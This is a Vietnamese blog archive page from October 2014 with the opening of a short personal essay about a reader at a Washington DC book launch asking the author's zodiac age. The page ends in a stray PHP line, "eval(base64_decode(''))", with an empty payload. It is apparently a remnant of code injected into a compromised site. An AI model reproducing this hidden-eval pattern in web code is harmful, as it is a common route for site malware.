Archive for October 4th, 2014

TUỔI CON THOI

TUỔI CON THOI

(Với bác Lữ Lan tại DC, 13-9-2014) Hôm 13 tháng 9 ở Washington DC, có một bạn đọc tham dự buổi ra mắt sách hỏi tôi “tuổi con gì” nhưng vì bận trả lời câu hỏi của nhà văn Trương Anh Thụy nên không kịp trả lời, và sau đó lại quê

10.4.2014 | Viết ngắn |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>